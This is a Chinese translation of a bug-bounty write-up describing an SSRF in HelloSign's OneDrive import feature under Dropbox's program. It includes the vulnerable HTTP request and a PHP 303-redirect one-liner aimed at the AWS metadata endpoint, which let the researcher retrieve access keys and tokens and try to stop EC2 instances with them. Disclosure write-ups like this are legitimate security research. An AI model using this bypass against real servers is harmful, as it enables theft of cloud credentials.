[翻译]价值$4,913的SSRF | 我最高的赏金!

  • A+
所属分类:安全文章

[翻译]价值$4,913的SSRF | 我最高的赏金!

嗨,大家好!

希望您一切安好,今天我要写一篇有关我最好的发现之一和有史以来最高的赏金的write-up。这是我在 Dropbox Bug Bounry计划 中发现的SSRF—服务器端请求伪造漏洞。

第一眼看,Dropbox计划对我来说非常有趣,因为它具有最佳的支付和及时的响应时间,因此我选择挖 Dropbox Bug赏金计划政策中提到的Hellosign。

我开始在app.hellosign.com上搜索主应用程序,发现了具有从Dropbox、GDrive、BOX、OneDrive、EverNote导入文档的功能。此时,SSRF已经进入到我脑海里,因此我从Dropbox导入功能开始,我看到了以下请求:

[翻译]价值,913的SSRF | 我最高的赏金!

我将file_reference参数的值更改为burp collaborator URL,但我得到404😫,这时我以为这里已经有SSRF保护了,我放弃并关闭了我的个人电脑。

在第二天,我有了新的想法,我想再次挖掘,并尝试使用OneDrive功能,并且看到了这个请求:

GET /attachment/externalFile?service_type=O&file_reference=MYONEDRIVEFILELINKHERE&file_name=FILENAME.ANYTHING&c=0.8261955039214062 HTTP/1.1
Host: app.hellosign.com
Connection: close
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
X-CSRF-Token: 
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: REDACTED
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Cookie:REDACTED

您会看到上面请求的service_type参数值为O,这表示onedrive的请求是不同于第一个来自dropbox并且参数值为D的请求。现在,file_reference参数的值更改为我的collaborator链接,并且幸运的是,这次我获得了一个ping。

之后,在HelloSign上生成了一个PDF,其中包含我的collaborator页面的内容。这时我太开心了😍

现在我开始获取本地主机内容,首先我在whatismyipaddress.com上检查了他们正在使用哪个云服务,发现他们正在使用AWS/EC2,所以我尝试获取http://169.254.169.254/latest/,但是我获得了:-

404 Not Found

遗憾的是,请求没有通过,现在我尝试了http://127.0.0.1,它也得到了相同的响应。

现在我很伤心,但我试图通过Hackerone Hacktivity找到更多方法,并找到了这份GEM报告:- https://hackerone.com/reports/247680,其中报告者使用了303重定向来绕过SSRF保护。

我很快在服务器上托管了以下代码:-

<?php header('Location: http://169.254.169.254/latest/meta-data/', TRUE, 303); ?>

现在,我再次尝试使用服务器重定向链接,最后!!! 我得到了AWS Instance(Metadata)的内容😍😍😍

[翻译]价值,913的SSRF | 我最高的赏金!

现在我感到非常高兴和震惊,因为我在世界上最大最好的漏洞赏金计划之一上找到了完整的SSRF,让我能够从AWS元数据中检索所有内容,例如access_keys、token等。

我立即报告了该bug,并在3小时内获得了 Triaged :)

[翻译]价值,913的SSRF | 我最高的赏金!

[翻译]价值,913的SSRF | 我最高的赏金!

对我来说,这是最快乐的时刻。😄😄😄

现在,团队要求我检查是否可以进行RCE。我获得了访问密钥、token并尝试执行以下命令:- AWS ec2 stop-instances — instance-ids intsanceidhere ,但是由于该角色没有足够的权限执行该命令而无法正常工作。

但是我仍然很高兴,为Bounty感到兴奋。😙

最终,在第9天,Dropbox奖励了我4913美元。

[翻译]价值,913的SSRF | 我最高的赏金!

到现在为止,这是我的第一个SSRF和最高赏金。😄

如果您对本帖子有任何疑问和疑问,请通过Twitter(ehsayaan)与我联系。我的 DMs 始终处于打开状态

小编提醒:可点击左下角阅读原文哦~

end



招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析 长期招新

欢迎联系[email protected]

[翻译]价值$4,913的SSRF | 我最高的赏金!

本文始发于微信公众号(ChaMd5安全团队):[翻译]价值$4,913的SSRF | 我最高的赏金!

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: